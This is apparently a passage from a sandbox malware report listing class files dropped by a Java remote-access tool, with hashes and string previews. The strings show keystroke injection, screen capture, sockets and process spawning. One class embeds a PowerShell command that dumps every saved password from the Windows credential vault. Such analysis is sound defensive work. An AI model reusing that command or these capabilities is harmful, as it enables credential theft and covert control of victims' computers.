                        Preview:.......4..................................()V...<init>...Code..&LcarLambo/wvGnyIgrUOTdXfGRPmvbIDXjmea;...[Ljava/lang/String;.. carLambo/TgBoQLFFtKbHGgBZrVBiDrm...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/String...nnHRYoAONroTDXAkGOnAtRE.0................................................*...*..............

                        C:\jar\carLambo\User32.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):320
                        Entropy (8bit):5.376457698926428
                        Encrypted:false
                        SSDEEP:6:2mYCLTKbUwCvWqdUwCvWiUwCvWqtGi1BoUwCFRPfAKmklAlI:EoT/wCvWfwCvWhwCvW6p1xwCFRHlGi
                        MD5:CDB50558D382E6554721DDD443BC7744
                        SHA1:55E88F2195A0C808E3330DE4DBE5DFBAC091201F
                        SHA-256:7DEF5E0649A951A502C01BC34A444DAD98805C0EF2C06E82FC3554742A16532E
                        SHA-512:9FAD12AAC340B417262895B7D2AB4304F8C3985997A117FA4CFFC4B515CF07208053519ECA569155A0E00C0DC606B02DE6593F0587D367BC88440F5FF3919DED
                        Malicious:false
                        Preview:.......4..............(BBII)V..Q(Lcom/sun/jna/platform/win32/WinDef$HWND;)Lcom/sun/jna/platform/win32/WinDef$HDC;...(Lcom/sun/jna/platform/win32/WinDef$HWND;[BI)I...GetWindowDC...GetWindowTextA...carLambo/User32..!com/sun/jna/platform/win32/User32...java/lang/Object...keybd_event........................................

                        C:\jar\carLambo\VRdaqkGKmButMUdsZLfSOLnpgVk.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1754
                        Entropy (8bit):5.683676344488871
                        Encrypted:false
                        SSDEEP:48:orX16cSgjo54CvWiJFLC3nnKCyCvW8+QHz5D8KvRq7nrHspVEJzmH+:o0jFzFEP+VKv47nrH22VmH+
                        MD5:5445BD2AABDD4F1C9522D025E98E5AF5
                        SHA1:34ED09E5FE0725234E68FFB2E5C3B0B65592A90C
                        SHA-256:B0A518623F8A322E45BD9B963E548ECADFA8AFFAA5E7B36F1DF45EC798C4CF55
                        SHA-512:0797427396B3AF381409B6017D0E9A3A39AF112927A26109E0AF36B627E50AA594C615FF352CFE24CE93F1DC9E392FFCA57A5797988A6D1D1689F3FAB8D670C6
                        Malicious:false
                        Preview:.......4.S..0..1..2..3..4..D..G..H..I..M..N..O..P..........................;........<.............,....'....+....%....%........./....%....(....)....-....*....&..=.7..?.:..A.C..F.9..F.<..J.5..K.@..L.B..Q.6..R.8..R.;... Sec... day ... hr ... min ... sec...()J...()Ljava/lang/String;...()V...(J)Ljava/lang/String;...(J)Ljava/lang/StringBuilder;..5(Lcom/sun/jna/platform/win32/WinUser$LASTINPUTINFO;)Z..&(Ljava/lang/Object;)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...<init>...Code...GetLastInputInfo...I...INSTANCE...J..#Lcom/sun/jna/platform/win32/User32;...Not Idle...StackMapTable...append..$carLambo/VRdaqkGKmButMUdsZLfSOLnpgVk..!com/sun/jna/platform/win32/User32..0com/sun/jna/platform/win32/WinUser$LASTINPUTINFO...currentTimeMillis...dwTime...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/String...java/lang/StringBuilder...java/lang/System...toString...valueOf.1...........L.B.......=.7...>...7.......+*...*......#@...Y...N...-..$..W*.-....e...........L.6...>...

                        C:\jar\carLambo\WinGDI.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):324
                        Entropy (8bit):5.260373383168725
                        Encrypted:false
                        SSDEEP:6:WeNVjnY+kaGZXy1eUwCvWOMh5nWDA3bUwCvWOMhc8UwCvDRPU3sz+wl85//l:pNVjnvkZy1lwCvWz0DxwCvWzcrwCvDRy
                        MD5:AD45C3E50AB8656ECAFF9C840AF8281F
                        SHA1:9BAA18E4659B690F7EE49496AC318E4C7EA78308
                        SHA-256:EC32BCF18F93DD9F4E4D77BB1FBD36C7DF08052E352C2C06DC4B622BCBCCE747
                        SHA-512:69B02C35E4F1FBCD26AC2A9AC7D34509E4FBDE587E41AEF4C17C0C32AA3ED246032F0C98CC334A541497FEA2D7BBAC072B5D5EA0625C54B58BF3E6C6704E822F
                        Malicious:false
                        Preview:.......4...................... .......................()V...(J)V...<clinit>...<init>...Code..)Lcom/sun/jna/platform/win32/WinDef$DWORD;...SRCCOPY...carLambo/WinGDI..'com/sun/jna/platform/win32/WinDef$DWORD..!com/sun/jna/platform/win32/WinGDI...java/lang/Object...............................................Y................

                        C:\jar\carLambo\WzOHQjRyKNNQtPOMcLqvxzsvisZhr.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):404
                        Entropy (8bit):5.524843262593639
                        Encrypted:false
                        SSDEEP:12:FbQdNIGYy1EdNIx0K6AdNIZLnxaJtRl9/LqkM50:FbQdy7y1EdyN/dyZTQHz9bM50
                        MD5:926713709777A7C3B985BDE381CEAB3D
                        SHA1:1E312BEFE15B55306535AA63774275F79E59F62A
                        SHA-256:8B1EA82CED893E695B7CBB2741B6E7C1E3BF48050EBC072A489DBEEA2FCB0F45
                        SHA-512:823E729E57642486091CDBED101C9DFA514C6133E0EA81027D1FC356BDB7E38CB62776A7F9BC8CB78F4546E8CAC95A6A0E3A7DF2D1F5A62A5FF6EC92DC637A5D
                        Malicious:false
                        Preview:.......4...............................................()V..)(LcarLambo/eQJCBbLIHBNfWZJLmUQdjvxUQzC;)V...<init>...Code..&LcarLambo/eQJCBbLIHBNfWZJLmUQdjvxUQzC;..&carLambo/WzOHQjRyKNNQtPOMcLqvxzsvisZhr..$carLambo/eQJCBbLIHBNfWZJLmUQdjvxUQzC...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............

                        C:\jar\carLambo\XfrcwHiEekkBljrjyatNOjRICOGWh.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):2997
                        Entropy (8bit):5.904027246615274
                        Encrypted:false
                        SSDEEP:48:jm6CQBGeap7nJwh/r38SdU9n1H7qQrqNM5DVnq/3i/u2AIvyyE/zlF+22LQv3IEc:j/CvLBn0VffqxvKzlFvlv3PDpC
                        MD5:D843AAEB00849A9556FAC7404B01A8AF
                        SHA1:905667A62C3F05F3771778121533D0EBC5D8EC42
                        SHA-256:4BE83ACD2250355EA94FDD6B26B32099B1A423C5B88EA649E9A5808540C44B84
                        SHA-512:217F1B76FB449FAE2532DCF238EB3A090781E9737F3A43406341812F434F7BA29724F7BDFF1620294223D31A666F9D761DD8DFDA214BF32C117FF0360D37F566
                        Malicious:false
                        Preview:.......4....g..h..i...................................................................M....N....S....T....Y....Z....]....[....E....E....H....P...._....I....P....R....e....P....^....F....P....R....f....G....\....W....D....V....X....L....`....a....K....Q....U....d....D....O....c....J....b....V....X....n....p....q....r....s....t....v....}....~..............w....n....u....n..............o....j....m....k...................x.........|....m....z....l....n....m....m....x....{...............()Ljava/io/InputStream;...()Ljava/io/OutputStream;...()Ljava/lang/Process;...()Ljava/lang/String;...()V...()[B..+(LcarLambo/XfrcwHiEekkBljrjyatNOjRICOGWh;)V...(Ljava/io/InputStream;)V...(Ljava/io/OutputStream;)V...(Ljava/io/Reader;)V...(Ljava/io/Writer;)V...(Ljava/lang/Object;)Z...(Ljava/lang/Runnable;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V..'(Ljava/net/Socket;[Ljava/lang/String;)V...(Z)Ljava/lang/ProcessBuilder;...([B)V...([BII)I...([BII)V...([Ljava/lang/String;)V...<init>

                        C:\jar\carLambo\YEJPIdRNPZsBIbCpFLfaCVN.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):389
                        Entropy (8bit):5.5299865037558575
                        Encrypted:false
                        SSDEEP:6:Fb2U3jsW3cmMWlW4y133cmMR6DPWHS3cmMMQQnxaJ2qRPt+NclVXi8BPmlknM50:Fbrly13+gikLnxaJtRl9/LqkM50
                        MD5:B5CCE3EC2BCF15D622F94F91AADCAF7C
                        SHA1:B2C2035C95FF4D57175C97792AE89E2B50A6D7AE
                        SHA-256:1996CB092151F69B1704EBAA312951B29D053EBCDEBDF74E2C8F76661E42F6B2
                        SHA-512:DCDE02D1A194CC242BC4D33C74C640770CDF70572DF12FD8B7FCC872D4C9414C6467E5287E752DDB7F14F1C3ECC9D333E579B64B811307820A882461E5820C51
                        Malicious:false
                        Preview:.......4...............................................()V..&(LcarLambo/cUFMRzrqZzmkSJziceHSMVGQ;)V...<init>...Code..#LcarLambo/cUFMRzrqZzmkSJziceHSMVGQ;.. carLambo/YEJPIdRNPZsBIbCpFLfaCVN..!carLambo/cUFMRzrqZzmkSJziceHSMVGQ...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............

                        C:\jar\carLambo\YlqtqHSDDFgBzCqfJBUfI.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1307
                        Entropy (8bit):5.673348607994263
                        Encrypted:false
                        SSDEEP:24:XeqJDjMGy1c4V6lYNqQ2CxndxzigLrz0IM0HlHs4zEchgd/:uC5KwKNqQ2YzQI1Lhgd/
                        MD5:484D58ABEE51CD22C22D933C546FF083
                        SHA1:5901BAE0B352842839D7E4DD1E0B3B9D2DD944CC
                        SHA-256:87FCF75150D6A990DB61CDF7C428F9DA5F1940131FED4E67EC92FA8302181C6F
                        SHA-512:426F231E78148F6177D3E070AF89346EE6C72B0F24CB5AE98B1EE17DD58A03C899237A38E84BD21C199CB0FEB1722887CD26B2D710602012A39AD474429213F3
                        Malicious:false
                        Preview:.......4.L..6..7..>..?..@..A..B..C..D..E.............."....#....%....$.........&..............'....$.............. ....!....*..0.3..8.*..9.*..:.5..;.(..<.)..=.3..F.1..G.*..H.2..I.,..K.-...()Ljava/io/InputStream;...()Ljava/io/OutputStream;...()V..%(Ljava/net/Socket;Ljava/net/Socket;)V...([BII)I...([BII)V...<init>...Code...GYDTPVEwzYqRTvxmvHtRLJG...Ljava/io/InputStream;...Ljava/io/OutputStream;...Ljava/net/Socket;...StackMapTable...Z...[B...carLambo/YlqtqHSDDFgBzCqfJBUfI...close...flush...gQEuyVcYntwPXTysEtfquh...getInputStream...getOutputStream...ghKDbwZCNsgFCyEcTHODu...java/io/IOException...java/io/InputStream...java/io/OutputStream...java/lang/Exception...java/lang/Object...java/lang/Runnable...java/lang/Throwable...java/net/Socket...nnHRYoAONroTDXAkGOnAtRE...printStackTrace...qvNsplybcQmnatGjnQTThBZ...read...run...write.1.............:.5.....F.1.....H.2.....=.3.....0.3.........+.../...T.......+*...*....*+...*,...*+......*,.......W*..........#.$.....4........$.............J.*.../...2.

                        C:\jar\carLambo\a.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1631
                        Entropy (8bit):5.664039473604183
                        Encrypted:false
                        SSDEEP:48:wdyW214TQtwob5DI+U89e7Hr1Yq0oSaqf:2yK4ve7HpH0oSn
                        MD5:335DF3DC9FC24209223A3FC49B0F8B4A
                        SHA1:08DDECFF6340E24A390758830BF7D4EC81EAADD4
                        SHA-256:ACDB39711E52C236C5EF0F66DA40943F2D02DD4AA9D43E9A424326D70CF5E695
                        SHA-512:8BAFAB0E0B64EB67E284FFC1E693DDBC8A156D4E52B4B3105BCEA31680198E5C128E111968669B663D2132A73ACE21A0F8E82A6B8ED5424BE16508F5EA6ACD2E
                        Malicious:false
                        Preview:.......4.]..2..3..@..B..A..D..H..I..J..K..L..M..N..O..P..Q..R....,....&....)....*....+....#.........'....-....$..../....1....#....$....%....0....(..<.5..<.:..C.8..E.:..F.9..G.7..S.6..T.6..U.:..V.>..W.5..X.:..Z.;..[.4..\.4... is invalid key.VK_..* is not defined in java.awt.event.KeyEvent...()Ljava/lang/String;...()V...(I)V...(Ljava/lang/Object;)I..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..-(Ljava/lang/String;)Ljava/lang/reflect/Field;...(Ljava/lang/String;)V..'(Ljava/lang/String;)[Ljava/lang/String;...<init>...Code...Ljava/io/PrintStream;...StackMapTable...VK_...[Ljava/lang/String;...\+...append...carLambo/a...gQEuyVcYntwPXTysEtfquh...getField...getInt...java/awt/Robot...java/awt/event/KeyEvent...java/io/PrintStream...java/lang/Class.. java/lang/IllegalAccessException.."java/lang/IllegalArgumentException...java/lang/NoSuchFieldException...java/lang/String...java/lang/StringBuilder...java/lang/System...java/lang/reflect/Field...keyPress...keyRelease...nnHRYoAONroTDXAkGOnAtRE...out

                        C:\jar\carLambo\akllnBiTjwPmAwfMbajsTFm.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):2164
                        Entropy (8bit):5.848194950396849
                        Encrypted:false
                        SSDEEP:48:zgl+to1Ehse9vwBAMcvYWJ75TQ2AqNM5KyBa5vq8Zw8yOrt:E2o1hS9175p6WqKrt
                        MD5:C476698F30A29ACE57135CBA26FB39BA
                        SHA1:A6026877167A50845A5ADB16549A36A9C9BDDEF5
                        SHA-256:B994E1F015FD9E0E065C8B598572B06F88307DB637FD49369273900A9018CA2A
                        SHA-512:D03436E7619A8845D347EEE216EE9E734277AC35BF5F4ED0CCE97F7CAEBACD2896088F218616691D9A255ABA37BDEA37CE9D04EB15171B1E71F24F46D22E8FAA
                        Malicious:false
                        Yara Hits:
                        • Rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword, Description: Detects PowerShell content designed to retrieve passwords from host, Source: C:\jar\carLambo\akllnBiTjwPmAwfMbajsTFm.class, Author: ditekSHen
                        Preview:.......4....E..F..G..H..I..J.._..`..b..c..e..y.....d..g..o..p..q..r..s..t..u..v..w....8....2....5....=....1....5....0....9....:....3....>....@....6....7....;....<....?....A....B....D....0....4....C..\.P..\.S..\.T..\.[..f.X..h.P..i.U..j.V..k.^..l.L..m.M..n.W..x.K..z.O..{.Z..|.Y..}.N..~.Q..~.R....O....O............... ..@$vault = New-Object Windows.Security.Credentials.PasswordVault....5$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }...()I...()Ljava/io/InputStream;...()Ljava/io/OutputStream;...()Ljava/lang/Process;...()Ljava/lang/String;...()V...(I)Ljava/lang/String;...(II)Ljava/lang/String;...(Ljava/io/InputStream;)V...(Ljava/io/Reader;)V...(Ljava/lang/CharSequence;)Z...(Ljava/lang/Object;)Z...(Ljava/lang/String;)I..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..'(Ljava/lang/String;)[Ljava/lang/String;...(Z)Ljava/lang/ProcessBuilder;...([Ljava/lang/String;)V...<init>...Code...Ljava/lang/String;...No Password Found...Password: ...StackMapTable...Username: ...Website: ...[Ljava/lan

                        C:\jar\carLambo\b.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):6457
                        Entropy (8bit):6.037911000781222
                        Encrypted:false
                        SSDEEP:96:nPhBW8rFDgJC5YReBpCYDujLnJ7rZdlTJARfEFQTA8IbcOb:nrrFDWRRSCYEJ7HlqsFQTA8Ibck
                        MD5:B52C63A67C2B563C15BD10DA3FE29626
                        SHA1:CAAD527B427C3465A4F8360EDAD23E9CA8B0F723
                        SHA-256:0AD9C7F0183D84D6FC5FDBE1263F0356EA9EE6E4AFD1579CDDDE83105006BBB2
                        SHA-512:BF2046F4FF4EB178ECC01925174553457367501362398AF66B3BB7FE16EF4FFE08D3AEB258677283221DC1DBECAB54CC152BC897BBE01F453B8CEAA58E910757
                        Malicious:false
                        Preview:.......4..............................................?...........................................................................................Y....Z....[....\....]....^....c....p....s....t....u....|....~...._....e....f....g....h....i....j....q....r....l....v....W....V....m.........U....k.. .X.. .d.. .o.. .{..!.W..!.a..!.b..!.z..".n..".x..#.U..$.U..$.w..&.y..&.}..%.`.......................................................................................................................................................................................................................... key=... value=...()I...()Ljava/lang/Class;...()Ljava/lang/String;...()Ljava/util/prefs/Preferences;...()V...(I)C...(I)Ljava/lang/Integer;...(I)Ljava/lang/StringBuilder;...(I)V...(ILjava/lang/String;)V..&(ILjava/lang/String;I)Ljava/util/List;..%(ILjava/lang/String;I)Ljava/util/Map;..:(ILjava/lang/String;Ljava/lang/String;I)Ljava/lang/String;..)(ILjava/lang/String;Ljava/lang/String;I)V..;(ILjava/lang/Strin

                        C:\jar\carLambo\bQOGTazZDTmWsQIjxomKkpLaxswAl.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):605
                        Entropy (8bit):5.763657797884115
                        Encrypted:false
                        SSDEEP:12:k7l77cvIyjsINyhy1djGajjjBJKunxaJtRloOOul6zDdY:k7BcAypoy1dqaXdJKcQHzoa6z2
                        MD5:1E784B2DDE77676EEC6FC32FE209BCEF
                        SHA1:ED1732352C4DA74145CFB9E04ADA0F5390CFB918
                        SHA-256:9B80C5D5A72E8FBF830BC5B360FCACDF28A1DE8F408A7C1483F9BCA0B912F041
                        SHA-512:859234CC7A44DF1C477549557BC794B76A8D3A93D96577CA4F08D1AA6566D033963FCBA5EE183EF30043B3FC5B34DA8DA98E8FBB30E17E4D063FC2219F53E081
                        Malicious:false
                        Preview:.......4...................................................................()V..X(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;Ljava/net/Socket;LcarLambo/SjomlJrGISDYNqiAAulMONOv;)V...<init>...Code..!LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;..#LcarLambo/SjomlJrGISDYNqiAAulMONOv;...Ljava/net/Socket;...carLambo/CHHXGzeSpzwiJOAtZoSZBJ..&carLambo/bQOGTazZDTmWsQIjxomKkpLaxswAl...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...run.0................................................. ........*+...*,...*-...*..............................*...*...*.............

                        C:\jar\carLambo\cUFMRzrqZzmkSJziceHSMVGQ.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):5104
                        Entropy (8bit):6.095329676869486
                        Encrypted:false
                        SSDEEP:96:m52DWvW4FyuffwrB4gATDhzZ48EIy9IOCy7tr:m5hv3cU4DIybCyV
                        MD5:8AEC05B33A13303D523D304F00DBA48F
                        SHA1:F29EFD66C64B3D80C63A2D09FC29C85D16EF6186
                        SHA-256:D944C2313531DCA7631D1431E7510DEF4048D6F6A8A88DA17B2624CA01986DF7
                        SHA-512:91067804E15185ECDC26E57C3E7E35F77A488690B3A4D4578DAF5A9C3B5D3E4260EE3B106BF69FFE1368806714EC565A824BD29BA138EC46FD5004B24235D8D8
                        Malicious:false
                        Preview:.......4....x.................................................................................................Y....Z....\....a....b....e....f....g....i....o....j....P....m....Q....X....h....n....P....S....^....p....T....^....`....v....^....`....w....l....P....V....W...._....c....q....P....S....]....u....R....s....t....^....d....k....U....[....r....{....~..................................{.............................{.........{..............|....y............................................z....{...................{....}....{....z................()Ljava/io/OutputStream;...()Ljava/lang/String;...()V...()[B...(J)V..&(LcarLambo/cUFMRzrqZzmkSJziceHSMVGQ;)V..D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;...(Ljava/lang/Object;)Z...(Ljava/lang/Runnable;)V..&(Ljava/lang/String;)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...(Ljava/lang/String;)[B...(Ljava/lang/String;Z)V..&(Ljava/net/Socket;Ljava/lang/String;)V..3(Llc/kra/sys

                        C:\jar\carLambo\eQJCBbLIHBNfWZJLmUQdjvxUQzC.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):4459
                        Entropy (8bit):6.043498078207814
                        Encrypted:false
                        SSDEEP:96:TSKYkvdX5ks8nMFs5CPvCu/dXcs2eqxG9DeJ8FWz8gQ6u/dXt2n:W2dX5ksc6CuFXcsNqxG9Do8i8g5uFXt0
                        MD5:07C4B9666E9BECE18CCEB735EF10697A
                        SHA1:638C68E1632F8E786531C921EC3247B7D36D6B24
                        SHA-256:A2A2088C96D3097F40DA81177AF2DD1F959101FEF05DF3D41E67E379DFFA655B
                        SHA-512:DE408986041DAB126AE820EF8946DD74D0B663F3C384267FA1ECF692BA17636629353484434965DAE7684A49C32E6D7E00926F243A7948CF78979EC145CEA6B5
                        Malicious:false
                        Preview:.......4....w..x..y..z.......................................................................................................a....f....h....k....Q...._....`....S....m....j....l....R....^....v....P....i....P....c.. .W.. .n.. .p..!.]..!.e..".V..".Z..".[..".\..".b..".g..".o..".r..".s..".u..#.P..#.U..#.X..#.Y..#.t..$.T..$.q..%.c..%.d...................................................................................................|....}...........................................................~................................................ /T...()I...()Ljava/io/InputStream;...()Ljava/io/OutputStream;...()Ljava/lang/Process;...()Ljava/lang/Runtime;...()Ljava/lang/String;...()V...()[B...(I)Ljava/lang/String;...(I)Ljava/lang/StringBuilder;...(II)Ljava/lang/String;..)(LcarLambo/eQJCBbLIHBNfWZJLmUQdjvxUQzC;)V...(Ljava/io/InputStream;)V...(Ljava/io/Reader;)V...(Ljava/lang/CharSequence;)Z..&(Ljava/lang/Object;)Ljava/lang/String;...(Ljava/lang/Object;)Z...(Ljava/lang/Runnable;)V...(Ljava/lang/S

                        C:\jar\carLambo\fnSeRWCjpCYtFrMVMUvfGdMUp.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):425
                        Entropy (8bit):5.3297017748412285
                        Encrypted:false
                        SSDEEP:12:l29ZYnvk9y1zk6tkFnxaJY3RlT+8MtrvlorPeXS/k:lY889y1zPtkBQwzTHMh9dgk
                        MD5:4EFF7D645E765F9CA708FBA6757020C3
                        SHA1:FBFAE6A7521D4A2B1DC5B54B8A2ABAC5274789E2
                        SHA-256:8B621560710DB346C98CC57A848B7C4A4E4EA41B8D217D9D6485E1B9E9A8159E
                        SHA-512:E4FC2C4A296AED10A5FCB54A175A55E68BBE28D61C5B9EC225D774E3DC4C961456F70CB00B9BC9B9016843D47C979483827F75E87D6E694A88F18413A6C4AF21
                        Malicious:false
                        Preview:.......4...........................u0.................................()V...(J)V...(Z)Z...<init>...Code...StackMapTable..!carLambo/cUFMRzrqZzmkSJziceHSMVGQ.."carLambo/fnSeRWCjpCYtFrMVMUvfGdMUp...gQEuyVcYntwPXTysEtfquh...java/lang/Exception...java/lang/Object...java/lang/Runnable...java/lang/Thread...run...sleep.0..................................*.....................4..................W.W.................................

                        C:\jar\carLambo\gQEuyVcYntwPXTysEtfquh.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1865
                        Entropy (8bit):5.805100375898925
                        Encrypted:false
                        SSDEEP:48:qCClP4sHYcKmAI6+61fQlQ2Of/zWNk3usoimVJfvha:qRPH5K/IE4pO/usoDHa
                        MD5:FAC42C29E155E1B389119EB06EEDAEF8
                        SHA1:98B611345F70C2FB020513DD7F6080AF0F49A528
                        SHA-256:7458015FC6760A82F716D3F7BE2D7F7767E2DE794E7462B03577D3D8856B4F48
                        SHA-512:28B49399656F86A5E9222CF6F560D842DAE5C844F98A8836CA6E006163E58CBC4B2F4589E6CAB8EFBBAFA34155E9A0BF9E67C3207579833F64550CD02CDA9F8C
                        Malicious:false
                        Preview:.......4.w.......R..S..U..V..X..[..d..e..f..g..h..i..j..k..l..m..n....<....+....*....>..../....0....3....7....:....;....=....?....*....9....1....5....8....2....6....,.........-....4..Q.A..Q.H..Q.M..Q.O..Q.P..Y.D..Z.B..\.N..^.K.._.L..`.B..a.F..a.G..b.@..c.E..o.M..q.L..r.D..s.I..t.@..u.C..v.L...()I...()V...()[B...()[C...(I)Ljava/nio/ByteBuffer;..B(ILjava/security/Key;Ljava/security/spec/AlgorithmParameterSpec;)V..)(Ljava/lang/String;)Ljavax/crypto/Cipher;..3(Ljava/lang/String;)Ljavax/crypto/SecretKeyFactory;...(Ljava/lang/String;)V...(Ljava/lang/String;[B)Ljavax/crypto/SecretKey;...(Ljava/lang/String;[B)[B..6(Ljava/security/spec/KeySpec;)Ljavax/crypto/SecretKey;...([B)Ljava/nio/ByteBuffer;...([B)V...([B)[B...([BLjava/lang/String;)V...([C[BII)V...<init>...AES...AES/CBC/PKCS5PADDING...Code..SNonce size is incorrect. Make sure that the incoming data is an AES encrypted file....PBKDF2WithHmacSHA1...StackMapTable...[B...allocate...array...carLambo/gQEuyVcYntwPXTysEtfquh...doFinal...gQEuyVcYnt

                        C:\jar\carLambo\gcLmiwpDoXkEofFgIgnkAFbECjBM.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):9142
                        Entropy (8bit):6.37171406283025
                        Encrypted:false
                        SSDEEP:192:3vMddEU20zVrkkkL2VCaMXfK2XCuG2/SvCVAGNfli:3WdNx4kdVEXfKgT/SvCk
                        MD5:A95739E5E9BE30BAD71B240E1C82891F
                        SHA1:E59D1C237E343D52F1CAF222299DE3571AD87C7D
                        SHA-256:18BA14777BF084A5EE67F4B7AF833A2366E4D7DCAA251713C96651C785EA1058
                        SHA-512:A0D649DDFA5F28E55F9A9AA344C2792529EB14D73CC085AE7268EAA435C27521EAAB0FAB448EE32065E15798BC0B7197B4ACB281AC325F6B1B78F816DCBC4873
                        Malicious:false
                        Preview:.......4...D.....C..D..E..F..G..H..I..J..n..o..p..q..r..s..t..u..w..}..~.............................................................................................................................................................................................................................d....................;....;....;....;....;....;....;....;....;....;....;....;....;....;....;....;....;....;....;....;....;....;....;....;."..;.$..;.*..;.,..;....;.0..;.5..;.>..;.?..<....<.*..=....=.)..?....@....@.+..I....I....I....I.@..O.6..W./..7....8....9....:....:....:....:....:....:....:....:....:....:.&..:.'..:.(..:.-..:.4..<....>....?....@....A....A....C....C....D....E....F....F....G....G....H....H....J....K....K....L....M....N....N.%..O....O....O....O....O....O....O. ..O.!..P....P....P.B..Q.2..Q.3..R....R.1..S....T....T....T....U....U....U....U.8..U.:..U.;..U.<..U.A..V....V....V....V....V.=..W....W....X....X.7..X.9..Y....Z....Z....[.#..v.O..v.Y..v.\..v.c..v.h..v.i..v.j..v.k..x....y.N..y....z

                        C:\jar\carLambo\ghKDbwZCNsgFCyEcTHODu.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):888
                        Entropy (8bit):5.66217626492331
                        Encrypted:false
                        SSDEEP:12:RVGMlwMxzeCMO6DewMaMT2De9MTMBMRMJy1DgDesYMOZERSfgmHgD8nxaJQRluM8:RYMlwMxnpy1DrERSYsQizn+lcTdWXlr/
                        MD5:48682699090E32C183D70891E84F0FDC
                        SHA1:AA23556FD74A1324E571BB286C93D4CFE6E39D27
                        SHA-256:00CC01F556AE041546740F22672182D559D8D1A4B04372E67E7EC45868BE2904
                        SHA-512:68FF40935426A109D9AC5A31EDCEBE3B2C850AEF4EF064056517C96E761476F404BE56360D6FD7A3DD3121595655218B278634B7893D7182C5047D85857B15D1
                        Malicious:false
                        Preview:.......4.5..#..(..)..+..,..-...../...............................................!....!. ..'....*....*.&..0.$..1.%..2. ..4.....()Ljava/lang/String;...()V..I(LcarLambo/qvNsplybcQmnatGjnQTThBZ;Ljava/lang/String;Ljava/lang/String;)V..8(LcarLambo/qvNsplybcQmnatGjnQTThBZ;[Ljava/lang/String;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...<init>...Code...Downloaded: .."LcarLambo/qvNsplybcQmnatGjnQTThBZ;...Ljava/io/PrintStream;...[Ljava/lang/String;...append...carLambo/ghKDbwZCNsgFCyEcTHODu.. carLambo/qvNsplybcQmnatGjnQTThBZ...gQEuyVcYntwPXTysEtfquh...java/io/PrintStream...java/lang/Object...java/lang/Runnable...java/lang/StringBuilder...java/lang/System...nnHRYoAONroTDXAkGOnAtRE...out...println...run...toString.0.............*.&.....0.$.......!....."............*+...*,...*...........3....."...;......./*...*....2*....2.........Y.....*....2................

                        C:\jar\carLambo\gjWVByXBXFzoJIWyWKFqdDDX.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1287
                        Entropy (8bit):5.871854571382549
                        Encrypted:false
                        SSDEEP:24:IplKHiNq0ny1fk+7VwBc26Q3z5TqUIHXy6gbel6/:UrNqOI7GQQ3z5TjIHLgelK
                        MD5:090729C4BD64CC0AFC1D74A60F1CA36F
                        SHA1:9DE5E08C20B2393F920B664B2F74950F792725C4
                        SHA-256:4FA50508997EB6ACBCA26C49C382163F49F046080016B81D33E288768B6E1FE7
